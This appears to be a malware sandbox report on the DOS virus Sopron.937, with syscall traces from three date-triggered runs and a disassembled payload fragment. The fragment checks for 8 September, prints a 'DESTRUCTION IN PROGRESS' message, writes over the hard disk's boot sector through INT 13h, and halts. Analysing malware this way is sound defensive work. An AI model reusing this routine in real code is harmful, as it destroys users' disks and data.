Sample viewer

vx.netlux.org/Virus.DOS.Sopron.937

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:15:34.129429091Z 37 PC: 12abb | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T23:15:34.13525008Z 37 PC: 12abf | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T23:15:34.136958985Z 42 PC: 12b20 | Get date
0x12b20: cmp dx, 0x908
0x12b24: jne 0x12b40
0x12b26: mov dx, si
0x12b28: add dx, 0x3f5
0x12b2c: push cs
0x12b2d: pop ds
0x12b2e: mov ah, 9
0x12b30: int 0x21
0x12b32: mov dl, 0x80
0x12b34: xor dh, dh
0x12b36: mov cx, 1
0x12b39: mov ax, 0x310
0x12b3c: int 0x13
0x12b3e: cli
0x12b3f: hlt
0x12b40: mov ax, 0xabcd
0x12b43: int 0x21
0x12b45: cmp ax, 0x908
0x12b48: je 0x12b9f
0x12b4a: push es
2018-12-17T23:15:34.139208854Z 171 PC: 12b45 | UNKNOWN!
2018-12-17T23:15:34.142458382Z 74 PC: 12b5e | Reallocate memory
2018-12-17T23:15:34.143863018Z 72 PC: 12b65 | Allocate memory
2018-12-17T23:15:34.145392025Z 53 PC: 12b8e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:15:34.146531883Z 37 PC: 12b9e | Set interrupt vector (Interrupt = '33' AKA 'Random read')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7006,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:07:09.519081372Z 37 PC: 12abb | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T13:07:09.520388198Z 37 PC: 12abf | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T13:07:09.521449942Z 42 PC: 12b20 | Get date
0x12b20: cmp dx, 0x908
0x12b24: jne 0x12b40
0x12b26: mov dx, si
0x12b28: add dx, 0x3f5
0x12b2c: push cs
0x12b2d: pop ds
0x12b2e: mov ah, 9
0x12b30: int 0x21
0x12b32: mov dl, 0x80
0x12b34: xor dh, dh
0x12b36: mov cx, 1
0x12b39: mov ax, 0x310
0x12b3c: int 0x13
0x12b3e: cli
0x12b3f: hlt
0x12b40: mov ax, 0xabcd
0x12b43: int 0x21
0x12b45: cmp ax, 0x908
0x12b48: je 0x12b9f
0x12b4a: push es
2018-12-25T13:07:09.523222577Z 171 PC: 12b45 | UNKNOWN!
2018-12-25T13:07:09.524612835Z 74 PC: 12b5e | Reallocate memory
2018-12-25T13:07:09.525523654Z 72 PC: 12b65 | Allocate memory
2018-12-25T13:07:09.52652365Z 53 PC: 12b8e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T13:07:09.527406266Z 37 PC: 12b9e | Set interrupt vector (Interrupt = '33' AKA 'Random read')

{"DateBased":true,"Day":8,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7006,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:00:48.873107183Z 37 PC: 12abb | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:00:48.874353796Z 37 PC: 12abf | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:00:48.876355995Z 42 PC: 12b20 | Get date
0x12b20: cmp dx, 0x908
0x12b24: jne 0x12b40
0x12b26: mov dx, si
0x12b28: add dx, 0x3f5
0x12b2c: push cs
0x12b2d: pop ds
0x12b2e: mov ah, 9
0x12b30: int 0x21
0x12b32: mov dl, 0x80
0x12b34: xor dh, dh
0x12b36: mov cx, 1
0x12b39: mov ax, 0x310
0x12b3c: int 0x13
0x12b3e: cli
0x12b3f: hlt
0x12b40: mov ax, 0xabcd
0x12b43: int 0x21
0x12b45: cmp ax, 0x908
0x12b48: je 0x12b9f
0x12b4a: push es
2018-12-25T12:00:48.878735868Z 9 PC: 12b32 | Display string (String= '�  HDD-CLEANER Version 2.0   Copyright (c) 1997 (1st JAN)   Made in Hungary, Sopron  DESTRUCTION IN PROGRESS...')